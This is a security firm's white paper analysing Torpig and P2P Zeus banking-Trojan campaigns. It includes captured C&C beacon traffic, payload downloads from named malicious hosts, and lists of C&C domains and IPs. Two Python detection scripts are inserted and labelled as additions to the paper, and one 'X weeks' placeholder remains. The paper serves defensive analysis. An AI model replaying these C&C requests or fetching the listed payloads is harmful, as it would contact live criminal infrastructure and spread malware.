The Trojan Wars: Building the Big Picture to Combat eFraud

mnemonic Threat Intelligence Unit White Paper

Table of Contents

Introduction
The Initial Campaign
  • Infection Cycles
  • Ice IX – Downloading Torpig and Pushdo
  • Torpig Campaign C&C infrastructure
  • Ice IX Takedown Avoidance Technique
The Follow-on P2P Campaign
  • Infection Cycles
  • Neurevt – Downloading P2P Zeus
The Way Forward: Conclusions and Recommendations
About mnemonic
References

The Trojan Wars - Building the Big Picture to Combat eFraud mnemonic as

Introduction

Trojans are a very sophisticated type of malware, and their use by cybercriminals to perform widespread eFraud is now well established. They are rarely operated in a standalone mode, and the infrastructure used to spread and maintain Trojans is constantly becoming more robust. It is apparent that cybercriminals are spending a considerable amount of time and effort to maintain control of the computers that they have infected. Like the managers of any modern-day business, they wish to protect their investment.

We have followed two major Trojan distribution operations over more than five months, analysing infection cycles and the associated Command & Control (C&C) infrastructure. The first operation we observed distributed the Torpig (Sinowal) Trojan [1], while the second distributed the peer-to-peer (P2P) Zeus Trojan [2, 8]. Both operations used the Cutwail botnet [3], which specialises in distributing spam, to spread Trojans.

Blog articles and reports on parts of such malware distribution infrastructures are published daily. However, it is more challenging for targeted organisations, primarily retail banks, to create ‘the big picture’ of how the components work together to pose a considerably greater threat. In this white paper we have described the assembly of these components to show how the Trojan infrastructure has no single point of failure, why traditional takedown methods are ineffective, and why targeted organisations require first-rate threat intelligence with regional awareness.

After reading this article we hope you will have an increased understanding of:

• How bank Trojans operate at a technically detailed level
• How it is possible to monitor and prevent infection by bank Trojans
• The structure of Trojans, and command and control infrastructures
• The threat faced by retail banks from robust Trojan infrastructures


The Initial Torpig Campaign

In June 2013, we observed large volumes of spam directed at Norway. The e-mails claimed to come from well-known Norwegian brands, including airlines, telecommunications operators and TV channels. The e-mails contained zip files as attachments. TrustWave Spiderlabs discovered a similar distribution of e-mail against Australia in the same period [4]. Their analysis concluded that the attachments contained Andromeda Loader [5], which downloaded the Trojan Zbot (a Zeus variant). Our analysis and monitoring revealed that the Trojan infrastructure used in this case was more complex and robust.

Our initial analysis discovered that some of the emails sent to Norwegian recipients contained Andromeda Loader, while others contained Smoke Loader. Both Andromeda and Smoke Loader were used to download the Trojan Ice IX [6], a modified version of Zeus. In some cases we saw a two-stage download with Andromeda Loader downloading Smoke Loader which in turn downloaded Ice IX. The C&C domains used by Andromeda and Ice IX were identical to those reported by Spiderlabs. Ice IX, however, was not used as an attack platform, but to download the Trojan Torpig (Sinowal). After several weeks of such email we also observed some cases where Andromeda downloaded Torpig directly.

Two weeks after the initial spread of such email, we saw that Ice IX downloaded the Pushdo Trojan [3, 7] in addition to Torpig. Pushdo was then used to download the spam engine Cutwail, and the infected machines then tried to distribute new versions of Andromeda and Smoke Loader as email attachments. To summarize, we observed many malware variants and download stages in this Trojan distribution campaign - all very interesting, but why the complexity?

It turns out that the infrastructure used in this distribution operation has been designed to be very robust against takedowns, the primary technique that security companies and law enforcement authorities use to stop C&C infrastructures operating. Andromeda, Smoke Loader, Ice IX and Pushdo operated independently of each other after installation, and all were capable of downloading other types of malware. We observed that Ice IX periodically downloaded new versions of Torpig. If Torpig was removed from an infected computer, it was reinstalled by Ice IX shortly thereafter. If a part of the C&C infrastructure was stopped by outsiders, the other parts could be used to regain control. We also saw Ice IX use an effective takedown-avoidance tactic, described later in this paper. This tactic was so successful that the criminals didn’t need to use Andromeda or Smoke Loader to regain control over the infected computers. Other locations exposed to this Trojan distribution operation included Australia, Italy, the Netherlands, Germany and the United States.


Infection Cycles

The best way of understanding the infection cycle of the Torpig campaign is to show it graphically. The flow chart below illustrates the relationships between the different types of malware and infection vectors we observed in this operation:

[Flow chart: Torpig campaign infection cycle. Nodes: Spam; Smoke Loader; Andromeda Loader; Ice IX; Torpig (Sinowal); Pushdo; Cutwail. Spam delivers Smoke Loader and Andromeda Loader; both download Ice IX (Andromeda also downloaded Smoke Loader, and later Torpig directly); Ice IX downloads Torpig (Sinowal) and Pushdo; Pushdo downloads Cutwail, which sends new spam.]

Ice IX – Downloading Torpig and Pushdo

As soon as Ice IX was installed on an infected computer, it started to communicate with its drop zone every 10 minutes. A drop zone is generally used to harvest information from the infected computer, such as passwords. Communication with the drop zone – the URL hxxp://fincal[.]pl/ryadh.php (used in July 2013) – looked like this:

POST /ryadh.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: fincal.pl
Content-Length: 201
Proxy-Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: [REMOVED]
Content-Type: text/html
Connection: close
Content-Length: 64

Ice IX’s drop zone was used to tell the infected computer where it should download Torpig. The encrypted response from the drop zone contained the URL of the .exe file that was used to install Torpig. This .exe file was then downloaded using a regular HTTP GET request:

POST /ryadh.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: fincal.pl
Content-Length: 352
Proxy-Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: [REMOVED]
Content-Type: text/html
Connection: close
Content-Length: 162

GET /sdfoh934hoasndfhsyfgbifgnpqwedfbhweinfwe.exe HTTP/1.1
Accept: */*
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: shieldssmooth.org

HTTP/1.1 200 OK
Server: nginx
Date: [REMOVED]
Content-Type: application/octet-stream
Content-Length: 183808
Last-Modified: [REMOVED]
Connection: keep-alive
ETag: [REMOVED]
Accept-Ranges: bytes

This .exe file then downloaded and installed Torpig’s .dll and .dat files from a different domain. Two weeks after the initial spread of malware, Ice IX downloaded Pushdo. This took place in the same manner as with Torpig, where the download was initiated by Ice IX’s drop zone:

POST /ryadh.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: fincal.pl
Content-Length: 320
Proxy-Connection: Keep-Alive
Pragma: no-cache

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: [REMOVED]
Content-Type: text/html
Connection: close
Content-Length: 134

GET /admin/images/icons/6.exe HTTP/1.1
Accept: */*
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: sahdia.de

HTTP/1.1 200 OK
Date: [REMOVED]
Server: Apache (prohost.de)
Last-Modified: [REMOVED]
ETag: [REMOVED]
Accept-Ranges: bytes
Content-Length: 46592
Cache-Control: max-age=604800
Expires: [REMOVED]
Content-Type: application/x-msdownload

Pushdo then downloaded Cutwail and the infected computer tried to distribute email with new malware attached.

The fact that infected computers become spam bots amplifies the threat considerably. It means that more and more computers in the bank’s home market can be infected with banking Trojans. A higher number of infected computers with targeted attack code equates to a more severe threat to the targeted netbank.


Torpig Campaign C&C infrastructure

Andromeda, Ice IX, Torpig, Pushdo and Cutwail all used different C&C domains. Smoke Loader used static IP addresses. Andromeda and Ice IX, however, used the same IP addresses for their C&C infrastructure for more than five months. Both Andromeda’s and Ice IX’s C&C domains had three to four different IP addresses at any time, and these IP addresses changed frequently. The IP addresses were at all times distributed in different parts of the world, such as Bangladesh, China, Lebanon and the United States. The figure below shows an example of domains and IP addresses that were used in August 2013:

[Figure: example C&C domains and IP addresses, August 2013. Andromeda Loader C&C domain dotier.net and Ice IX drop zone domain priceless.su, with the IP addresses 194.158.4.42, 217.64.107.108, 190.85.249.159, 61.36.178.236, 222.35.102.133 and 220.247.243.174.]

Smoke Loader, Torpig, Pushdo and Cutwail used different C&C infrastructure, and we found no corresponding correlations for these.


Ice IX Takedown Avoidance Technique

Ice IX’s C&C infrastructure consisted of the following:

• A drop zone
• An initial (hard-coded) configuration URL
• A binary URL
• Six configuration URLs

The binary URL is normally used to download new versions of the Trojan, in other words new .exe files. This URL was not used by the Ice IX operation, probably because this functionality was handled by Andromeda and Smoke Loader. When Ice IX was installed it first contacted the initial configuration URL to download its configuration file. This configuration file contained the drop zone URL and six other configuration URLs. The drop zone URL was used to download other malware, and was therefore the most critical part of the operation. The six configuration URLs in the configuration file used different domains. None of these domains were active, so a lookup would give an NXDOMAIN result. We observed many takedown attempts trying to stop this Ice IX infrastructure. All efforts were directed against the drop zone and the initial configuration URL. After each of these attempts we saw the following technique used to regain control of the infected computers:

1. activate one of the six configuration URLs (a lookup now provides the same IP addresses as the drop zone)

2. distribute the new configuration file with the new drop zone to the infected computers

3. disable the configuration URL after approximately 48 hours (a lookup now gives a NXDOMAIN result)

This technique allowed the cybercriminals to regain control of the infected computers after each attempt to stop them, in other words the multiple takedown attempts were futile.
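One way a defender can watch for this cycle, as an added example that is not part of the mnemonic paper: once the six backup configuration domains have been extracted from the Ice IX configuration file, polling them for a change from NXDOMAIN to an answer, and checking whether that answer overlaps the known drop zone addresses, flags the moment a backup domain is switched on. The domain names, the addresses and the scripted resolver below are constructed placeholders standing in for real DNS lookups.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    kind: str               # "activated" or "deactivated"
    domain: str
    ips: frozenset
    matches_dropzone: bool  # answer overlaps the known drop zone addresses


class ConfigDomainMonitor:
    """Polls backup configuration domains and reports NXDOMAIN <-> resolving transitions."""

    def __init__(self, config_domains, dropzone_ips, resolve):
        self.domains = list(config_domains)
        self.dropzone_ips = frozenset(dropzone_ips)
        self.resolve = resolve                       # domain -> IPs; empty set means NXDOMAIN
        self.last = {d: frozenset() for d in self.domains}

    def poll(self):
        alerts = []
        for d in self.domains:
            now = frozenset(self.resolve(d))
            before = self.last[d]
            if now and not before:                   # dormant domain came alive
                alerts.append(Alert("activated", d, now, bool(now & self.dropzone_ips)))
            elif before and not now:                 # domain went back to NXDOMAIN
                alerts.append(Alert("deactivated", d, before, False))
            self.last[d] = now
        return alerts


class ScriptedResolver:
    """Stand-in for real DNS lookups (constructed); a missing zone entry means NXDOMAIN."""

    def __init__(self):
        self.zone = {}

    def __call__(self, domain):
        return self.zone.get(domain, set())


# Constructed data: placeholder domains and RFC 5737 documentation addresses.
CONFIG_DOMAINS = [f"cfg{i}.example" for i in range(1, 7)]
DROPZONE_IPS = {"192.0.2.10", "198.51.100.20", "203.0.113.30"}


def run_scenario():
    """Replays the activate / push config / disable cycle described in the paper."""
    resolver = ScriptedResolver()
    monitor = ConfigDomainMonitor(CONFIG_DOMAINS, DROPZONE_IPS, resolver)
    alerts = []
    alerts += monitor.poll()                         # all six NXDOMAIN: nothing to report
    # drop zone taken down; operators activate backup domain #3 on the same addresses
    resolver.zone["cfg3.example"] = {"192.0.2.10", "198.51.100.20"}
    alerts += monitor.poll()                         # one "activated" alert, drop zone match
    alerts += monitor.poll()                         # unchanged: no repeat alert
    del resolver.zone["cfg3.example"]                # ~48 hours later: back to NXDOMAIN
    alerts += monitor.poll()                         # one "deactivated" alert
    return alerts


if __name__ == "__main__":
    for a in run_scenario():
        print(a.kind, a.domain, sorted(a.ips), "drop zone match" if a.matches_dropzone else "")
```

In a live deployment the resolver would be replaced by real lookups against several recursive resolvers, since the activation window is only about 48 hours.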


The Follow-on P2P Zeus Campaign

Our continued monitoring of Cutwail revealed another major Trojan campaign using the established C&C infrastructure X weeks after the Torpig campaign. This was directed at the UK and spread the P2P (Gameover) Zeus Trojan using many different types of malware. We know that it is common practice for many criminal actors to co-operate in the malware supply and distribution chain. From what we observed, it is likely that another cybercriminal gang rented the infrastructure as a distribution vehicle for their campaign.

Some variants of malware used to download P2P Zeus have been described in other reports. Pony Loader [2] was extensively used in 2012 and the first three quarters of 2013. In the last quarter of 2013, however, we saw that the P2P Zeus operation adopted several alternative techniques to distribute it. We observed Upatre [9], Smoke Loader and Neurevt (Beta Bot) [10], which downloaded and installed P2P Zeus. The use of Upatre has been widely discussed elsewhere, so we will focus on Neurevt in this paper. P2P Zeus uses a distributed peer-to-peer network rather than a centralised C&C infrastructure. This makes P2P Zeus robust against attempts to stop the infrastructure. Moreover, it is difficult to follow the spread of P2P Zeus because many different variants of malware are used to download it.

We also observed the download of other malware from P2P Zeus, namely Neurevt, Pushdo, Kegotip and Smoke Loader. Kegotip [11] is another password-stealing Trojan, similar to Pony. In addition, other security analysts have seen P2P Zeus download the ransomware CryptoLocker [12].

One of our most interesting observations was that Pushdo and Smoke Loader in some cases downloaded Pony Loader, but the latter was not used to download additional malware. A likely explanation for this is that Pony Loader and Kegotip can be used to steal passwords from infected computers and that this could be the intended application. Evidence of this is given in published reports [13, 14] describing the theft of about two million passwords by Pony Loader linked to P2P Zeus.


Infection Cycles

The flow chart below illustrates the relationships between the different types of malware and infection vectors we observed in this operation:

[Flow chart: P2P Zeus campaign infection cycle. Nodes: Spam; Smoke Loader; Neurevt (Beta Bot); Upatre Loader; Pony Loader; P2P Zeus; Necurs; Pushdo; Kegotip; Cutwail. Spam delivers the loaders; Smoke Loader, Neurevt and Upatre download P2P Zeus; P2P Zeus downloads Neurevt, Pushdo, Kegotip and Smoke Loader; Pushdo and Smoke Loader in some cases download Pony Loader; Pushdo downloads Cutwail, which sends new spam. Necurs appears as a further node in the chart.]

Neurevt – Downloading P2P Zeus

We saw that Neurevt was spread as an email attachment from Cutwail in November 2013. When the attachment was run, Neurevt contacted its C&C URL at hxxp://85.143.166[.]167/ateb/order.php. The C&C server then requested the infected computer to download P2P Zeus from hxxp://62.76.43[.]63/comrade_zs.exe. The HTTP traffic was as follows:

POST /ateb/order.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727)
Host: 85.143.166.167
Content-Length: 612
Cache-Control: no-cache

ps0=[REMOVED]&ps1=[REMOVED]&cs1=[REMOVED]&cs2=[REMOVED]&cs3=[REMOVED]

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: [REMOVED]
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.19

GET /comrade_zs.exe HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727)
Host: 62.76.43.63
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: [REMOVED]
Content-Type: application/octet-stream
Content-Length: 299008
Connection: keep-alive
Last-Modified: [REMOVED]
ETag: [REMOVED]
Accept-Ranges: bytes
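Both C&C exchanges shown in this paper (Ice IX's POST to ryadh.php followed by the GET of the Torpig and Pushdo executables, and Neurevt's POST to order.php followed by the GET of comrade_zs.exe) share a shape that a web proxy log can expose: a small POST to a C&C script, repeated at a fixed interval in the Ice IX case, followed seconds later by an executable fetched from a different host. The detection below is an added example, not from the paper or mnemonic's service; the log format, client addresses and timestamps are constructed, while the hosts and paths are taken from the exchanges above.

```python
from collections import defaultdict
from datetime import datetime
from statistics import median

EXE_TYPES = {"application/octet-stream", "application/x-msdownload"}

# Constructed proxy log: "timestamp client method host path status content-type".
# Hosts and paths follow the exchanges in this paper; clients and times are invented.
SAMPLE_LOG = """
2013-07-10T10:00:00 10.0.0.5 POST fincal.pl /ryadh.php 200 text/html
2013-07-10T10:05:00 10.0.0.9 GET www.example.org /index.html 200 text/html
2013-07-10T10:10:00 10.0.0.5 POST fincal.pl /ryadh.php 200 text/html
2013-07-10T10:20:00 10.0.0.5 POST fincal.pl /ryadh.php 200 text/html
2013-07-10T10:20:03 10.0.0.5 GET shieldssmooth.org /sdfoh934hoasndfhsyfgbifgnpqwedfbhweinfwe.exe 200 application/octet-stream
2013-07-24T08:00:00 10.0.0.6 POST fincal.pl /ryadh.php 200 text/html
2013-07-24T08:00:02 10.0.0.6 GET sahdia.de /admin/images/icons/6.exe 200 application/x-msdownload
2013-11-12T09:00:00 10.0.0.7 POST 85.143.166.167 /ateb/order.php 200 text/html
2013-11-12T09:00:02 10.0.0.7 GET 62.76.43.63 /comrade_zs.exe 200 application/octet-stream
""".strip().splitlines()


def parse(lines):
    recs = []
    for ln in lines:
        ts, client, method, host, path, status, ctype = ln.split()
        recs.append({"ts": datetime.fromisoformat(ts), "client": client, "method": method,
                     "host": host, "path": path, "status": int(status), "ctype": ctype})
    return sorted(recs, key=lambda r: r["ts"])


def periodic_beacons(recs, min_hits=3, jitter_s=30):
    """POST series per (client, host, path) whose gaps all lie within jitter_s of the median gap."""
    series = defaultdict(list)
    for r in recs:
        if r["method"] == "POST":
            series[(r["client"], r["host"], r["path"])].append(r["ts"])
    found = []
    for (client, host, path), times in series.items():
        if len(times) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = median(gaps)
        if all(abs(g - period) <= jitter_s for g in gaps):
            found.append({"client": client, "host": host, "path": path,
                          "period_s": period, "hits": len(times)})
    return found


def ordered_downloads(recs, window_s=60):
    """Executable GET from another host within window_s after a POST by the same client."""
    posts = [r for r in recs if r["method"] == "POST"]
    chains = []
    for g in recs:
        if g["method"] != "GET" or g["ctype"] not in EXE_TYPES:
            continue
        for p in posts:
            delay = (g["ts"] - p["ts"]).total_seconds()
            if p["client"] == g["client"] and p["host"] != g["host"] and 0 <= delay <= window_s:
                chains.append({"client": g["client"], "cc": p["host"] + p["path"],
                               "payload": g["host"] + g["path"], "delay_s": delay})
                break
    return chains


def analyse(lines):
    recs = parse(lines)
    return periodic_beacons(recs), ordered_downloads(recs)
```

On the sample log the first function reports the 10-minute fincal.pl beacon and the second reports all three C&C-ordered downloads, including the single-POST Neurevt case that the periodicity check alone would miss.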


The Way Forward: Conclusions and Recommendations

The investment that cybercriminals have made in increasing the robustness of Trojan C&C infrastructures means that some existing countermeasures are ineffective. Cleaning of infected computers and takedowns of C&C infrastructure have become more difficult to accomplish. As a result, we can make three general recommendations.

1. Takedowns of C&C infrastructure require knowledge of the entire infection chain. Do not try to stop such infrastructure unless you understand the big picture and know how to stop the entire infrastructure. Partly stopping the C&C infrastructure makes the security work more difficult for others and has little impact on the cybercriminals.

2. Do not try to clean an infected computer using cleaning tools or anti-virus applications – it is likely to be a waste of time. An infected computer needs to be reformatted and reinstalled in order to be sure that the infection is completely removed. This is more important than ever because cybercriminals are now installing several types of independent malware on each machine.

3. If your business is under threat from Trojans, ensure that you understand the big picture. When it comes to threat intelligence for eFraud decision support, having just pieces of the jigsaw is not good enough to combat today’s cybercriminals. Work with an expert organisation that can intelligently put the pieces together so that you can take effective countermeasures to protect your business.


About mnemonic

mnemonic is the leading independent provider of IT security professional services and 24x7 managed security services in the Nordics. Our scale, expertise, flexibility and agility enable our enterprise customers to protect their businesses by deploying products and services from our portfolio, which covers the entire information security lifecycle. Our Threat Intelligence Division studies the evolution of advanced threats across the Nordic region and beyond so that we can keep our customers’ businesses safe from attack. mnemonic has created a 24x7 eFraud Prevention Service to protect worldwide financial institutions from Trojans targeting their netbanks. For more information visit www.mnemonic.no or contact [email protected]


References

[1] B. Stone-Gross, M. Cova, L. Cavallaro, B. Gilbert, M. Szydlowski, R. Kemmerer, C. Kruegel, G. Vigna. "Your Botnet is My Botnet: Analysis of a Botnet Takeover", Proceedings of the 16th ACM conference on Computer and communications security (CCS'09), 2009. http://seclab.cs.ucsb.edu/media/uploads/papers/torpig.pdf

[2] B. Stone-Gross. "The Lifecycle of Peer-to-Peer (Gameover) ZeuS", Dell SecureWorks CTU, 2012. http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/

[3] A. Decker, D. Sancho, L. Kharouni, M. Goncharov, R. McArdle. "A study of the Pushdo / Cutwail Botnet", Trend Micro, 2009. http://www.trendmicro.com/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf

[4] R. Mendrez. "Fake Qantas Spam Campaign Leads to Andromeda Bot Infection", Trustwave SpiderLabs blog, 2013. http://blog.spiderlabs.com/2013/06/fake-qantas-spam-campaign-leads-to-andromeda-bot-infection.html

[5] R. Bhatt. "Reversing Andromeda-Gamarue Botnet", Garage4Hackers blog, 2013. http://www.garage4hackers.com/content.php?r=154-Reversing-Andromeda-Gamarue-Botnet

[6] D. Tarakanov. "Ice IX: not cool at all", Kaspersky Lab ZAO Securelist blog, 2011. http://www.securelist.com/en/blog/563/Ice_IX_not_cool_at_all

[7] M. Antonakakis, B. Stone-Gross, J. Demar, K. Stevens, D. Dagon. "Unveiling The Latest Variant of Pushdo", Damballa Inc. / Dell SecureWorks CTU / Georgia Institute of Technology, GTISC, 2013. http://www.secureworks.com/assets/pdf-store/other/mv20.pdf

[8] CERT Polska. "ZeuS-P2P monitoring and analysis", CERT Polska, 2013. http://www.cert.pl/PDF/2013-06-p2p-rap_en.pdf

[9] B. Stone-Gross, R. Dickerson. "Upatre: Another Day Another Downloader", Dell SecureWorks CTU, 2013. http://www.secureworks.com/cyber-threat-intelligence/threats/analyzing-upatre-downloader/

[10] Microsoft Threat Encyclopedia. "Trojan:Win32/Neurevt.A", Microsoft, 2014. http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Trojan:Win32/Neurevt.A#tab=2

[11] Microsoft Threat Encyclopedia. "PWS:Win32/Kegotip.C", Microsoft, 2014. http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=PWS:Win32/Kegotip.C#tab=2

[12] K. Jarvis. "CryptoLocker Ransomware", Dell SecureWorks CTU, 2013. http://www.secureworks.com/cyber-threat-intelligence/threats/cryptolocker-ransomware/

[13] D. Chechik. "Look What I Found: Moar Pony!", Trustwave SpiderLabs blog, 2013. http://blog.spiderlabs.com/2013/12/look-what-i-found-moar-pony.html

[14] "Kafeine". "One ...random...Gameover Zeus Team Pony sample Story", Malware don't need Coffee, 2013. http://malware.dontneedcoffee.com/2013/12/zeus-game-over-team-is-behind-2.html
